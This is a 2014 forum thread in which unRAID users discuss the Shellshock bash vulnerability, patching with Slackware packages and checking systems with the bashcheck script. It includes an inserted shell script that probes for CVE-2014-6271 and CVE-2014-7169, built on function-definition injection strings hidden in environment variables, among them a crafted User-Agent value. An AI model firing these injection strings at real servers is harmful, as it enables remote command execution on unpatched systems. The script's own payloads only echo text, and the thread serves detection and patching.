mygoogoo Posted September 25, 2014
Perhaps we have another vulnerability.... http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/
I performed the test on unRAID 6.0-Beta9 as described in the article, and it seems to be affected. Not sure if this is a big deal with unRAID and how it is used.
WeeboTech Posted September 25, 2014
You have to consider that anything which takes user input and defines an environment variable is vulnerable. Then consider how much helpful shell script code people provide here, plus the fact that it runs as root. We're really already vulnerable to a malicious programmed intent. The issue with this particular situation is that user input from an external program could be coerced into running something that wasn't intended.

So, in summary:
1. If you accept external scripts and run them as root, you are already vulnerable (although you can audit these scripts).
2. Any external input, especially from the internet, makes you more vulnerable, even if you audit.
3. This is fuel for script kiddies to exploit.
4. Your older hardware devices that run Linux or bash of some sort have this bug also.

My recommendation would be for limetech to plug it. There's an update on Slackware already. For those who want to take matters into their own hands, you can download the Slackware bash update and put it in your /extras folder. While this does replace bash, any copies already running in memory will not get replaced, only future invocations.
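As an added example (not code from this thread, from unRAID or from Slackware), the following POSIX shell script models the pattern WeeboTech describes: untrusted input is copied into an environment variable and bash is then started, which is exactly what a CGI server, a DHCP client hook or an SSH forced command does. On an unpatched bash the attacker's trailing command runs before the intended one, as root if the caller is root. The script also carries the two probes that the bashcheck output later in the thread reports on, CVE-2014-6271 and CVE-2014-7169. The `bash` binary on PATH (override with BASH_BIN), the function names and the "User-Agent" payload are assumptions made for the demo.

```shell
#!/bin/sh
# Added example, not from the thread: model the Shellshock trigger and probe for it.
# Assumption: a bash binary on PATH; export BASH_BIN to test a different build,
# e.g. one freshly installed from a Slackware package.
BASH_BIN="${BASH_BIN:-bash}"

# The vulnerable pattern: attacker-controlled text (a constructed "User-Agent"
# value, as a CGI server would pass it) is exported into the environment and
# bash is started. An unpatched bash treats any value beginning with "() {" as
# a function definition and also executes whatever follows the closing brace,
# before it runs the command given to -c.
handle_request() {
    HTTP_USER_AGENT="$1" "$BASH_BIN" -c 'echo "served request"' 2>/dev/null
}

# Probe for CVE-2014-6271 (original Shellshock): the "echo VULN" after the
# function body runs while the environment is imported. Prints "vulnerable"
# or "patched".
check_cve_2014_6271() {
    out=$(x='() { :;}; echo VULN' "$BASH_BIN" -c 'echo probe' 2>/dev/null)
    case "$out" in
        *VULN*) echo vulnerable ;;
        *)      echo patched ;;
    esac
}

# Probe for CVE-2014-7169, the parser bug left behind by the first fix: the
# redirection inside the malformed definition leaks out, so "echo date" ends
# up writing the date into a file named "echo". Run in a scratch directory so
# nothing is left behind whichever way the probe goes.
check_cve_2014_7169() {
    d=$(mktemp -d) || return 1
    (cd "$d" && X='() { (a)=>\' "$BASH_BIN" -c 'echo date' >/dev/null 2>&1)
    if [ -s "$d/echo" ]; then r=vulnerable; else r=patched; fi
    rm -rf "$d"
    echo "$r"
}

# Report both probes, then push the 6271 payload through the "application"
# path. On a patched bash only "served request" appears; on an unpatched one
# "pwned via User-Agent" is printed first.
main() {
    if ! command -v "$BASH_BIN" >/dev/null 2>&1; then
        echo "no bash binary found at '$BASH_BIN'"
        return 1
    fi
    printf 'CVE-2014-6271: %s\n' "$(check_cve_2014_6271)"
    printf 'CVE-2014-7169: %s\n' "$(check_cve_2014_7169)"
    handle_request '() { :;}; echo "pwned via User-Agent"'
}

main "$@"
```

Run it once against the stock shell and once with BASH_BIN pointing at the replacement binary: the thread's point that already-running copies of bash are not fixed by dropping a package into /extras is visible here, because only the binary the script actually execs is probed.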
MSattler Posted September 25, 2014
> Perhaps we have another vulnerability.... http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/ I performed the test on unRAID 6.0-Beta9 as described in the article, and it seems to be affected. Not sure if this is a big deal with unRAID and how it is used.
If you limit access to the unRAID server it should not be a big deal, but any additional plugins/docker apps could make it more vulnerable.
limetech Posted September 25, 2014
beta10 has the latest "shellshock" patch incorporated, but, as with heartbleed, it won't be the last one until the vulnerability is completely vetted. You can follow the discussion here: http://seclists.org/oss-sec/2014/q3/index.html#654
This is mainly an issue only for internet-facing servers.
Note: I will be moving this thread to "Announcements".
Frank1940 Posted September 25, 2014
Limetech, I realize that this is probably not a major security item for most of us who are using version 5.0.5, but there does exist some risk. Are there any plans to release either a version 5.0.6 with just the upgraded Bash shell, or the new Bash shell with instructions on how to install it in existing 5.0.5 installations?
RobJ Posted September 28, 2014
There is now a Bash vulnerability check script, attached. Copy it to your flash drive, without the .txt extension. Testing an early version of it on my current UnRAID v5.0.5 produced:

    root@JacoBack:~# cd /boot
    root@JacoBack:/boot# bashcheck
    Vulnerable to CVE-2014-6271 (original shellshock)
    Vulnerable to CVE-2014-7169 (taviso bug)
    ./bashcheck: line 18: 4777 Segmentation fault (core dumped) bash -c "true $(printf '<<EOF %.0s' {1..79})" 2> /dev/null
    Vulnerable to CVE-2014-7186 (redir_stack bug)
    Test for CVE-2014-7187 not reliable without address sanitizer
    Variable function parser still active, likely vulnerable to yet unknown parser bugs like CVE-2014-6277 (lcamtuf bug)
    root@JacoBack:/boot#

Not a pretty sight. Perhaps others could test it on the current v6.0-beta9, and the soon coming -beta10.
I do NOT see this as a serious problem though, if you keep your server off the Internet and NEVER try unvetted scripts. Of course, as a DOS/Windows based user like many others here, I have never and will never allow my server to be open to the Internet, unless in the future I load a reputable Linux distro in a VM. I do not consider myself a sufficiently experienced Linux user. I also will never download scripts from the Web unless they have been vetted by experienced and trusted UnRAID users.
Edit: updated the attached bashcheck script; to be sure of the latest, use the link in Tom's post, following this one.
Edit2: gave up trying to attach the current bashcheck, as it is currently updated several times a day. Please go to https://github.com/hannob/bashcheck to download the latest version.
limetech Posted September 28, 2014
> There is now a Bash vulnerability check script, attached. Copy it to your flash drive, without the .txt extension.
Where did you find that?
EDIT: nevermind, found it: https://github.com/hannob/bashcheck
On -beta10, which has the latest patch produced yesterday, it yields:

    Not vulnerable to CVE-2014-6271 (original shellshock)
    Not vulnerable to CVE-2014-7169 (taviso bug)
    Vulnerable to CVE-2014-7186 (redir_stack bug)
    Test for CVE-2014-7187 not reliable without address sanitizer
    Variable function parser still active, likely vulnerable to yet unknown parser bugs like CVE-2014-6277 (lcamtuf bug)
zoggy Posted September 29, 2014
fyi, i had to update my bash again today to finally get it to pass that bashcheck script.
Frank1940 Posted September 29, 2014
> fyi, i had to update my bash again today to finally get it to pass that bashcheck script.
How are you installing it? I believe that the old vulnerable version is what is in the 5.0.5 build. I am reasonably sure you can install a non-vulnerable version of Bash into a currently running unRAID system, but that installation will not survive a reboot. It probably takes one or more line(s) of code in the 'go' script to do that.
BRiT Posted September 29, 2014
> > fyi, i had to update my bash again today to finally get it to pass that bashcheck script.
> How are you installing it? I believe that the old vulnerable version is what is in the 5.0.5 build. I am reasonably sure you can install a non-vulnerable version of Bash into a currently running unRAID system, but that installation will not survive a reboot. It probably takes one or more line(s) of code in the 'go' script to do that.
I think you can place the fixed version of the Bash Slackware package (tgz / txz) in the /boot/extras directory and it will be installed without any lines added to the go or stop scripts.
Frank1940 Posted September 29, 2014
> > > fyi, i had to update my bash again today to finally get it to pass that bashcheck script.
> > How are you installing it? I believe that the old vulnerable version is what is in the 5.0.5 build. I am reasonably sure you can install a non-vulnerable version of Bash into a currently running unRAID system, but that installation will not survive a reboot. It probably takes one or more line(s) of code in the 'go' script to do that.
> I think you can place the fixed version of the Bash Slackware package (tgz / txz) in the /boot/extras directory and it will be installed without any lines added to the go or stop scripts.
Have you done this? Do you have a link to the website that contains the updated package that would work in ver 5.0.5?
limetech Posted September 29, 2014
> Have you done this? Do you have a link to the website that contains the updated package that would work in ver 5.0.5?
You can get the latest bash security patches here: http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.559646
But do you have your unRAID server directly facing the internet? If not, do hackers have access to your private LAN where your unRAID server is connected? If the answer to these is Yes, then maybe you need to update. If No, then no need. Same with heartbleed.
Frank1940 Posted September 29, 2014
> > Have you done this? Do you have a link to the website that contains the updated package that would work in ver 5.0.5?
> You can get the latest bash security patches here: http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.559646
Would this be the correct file and location to get it?
ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bash-4.1.014-i486-1_slack13.1.txz
And would one install it by just placing it in the /boot/extras directory and rebooting?
switchman Posted September 29, 2014
I also would like to know which version is the correct version for 5.0.5 and how to install it.
RobJ Posted October 2, 2014
I gave up trying to keep my post above updated with the latest version of the bashcheck script. It is currently being updated several times a day, with significant changes. For the latest copy, go to https://github.com/hannob/bashcheck.
zoggy Posted October 4, 2014
You can just grab the latest by doing:

    wget "https://raw.githubusercontent.com/hannob/bashcheck/master/bashcheck"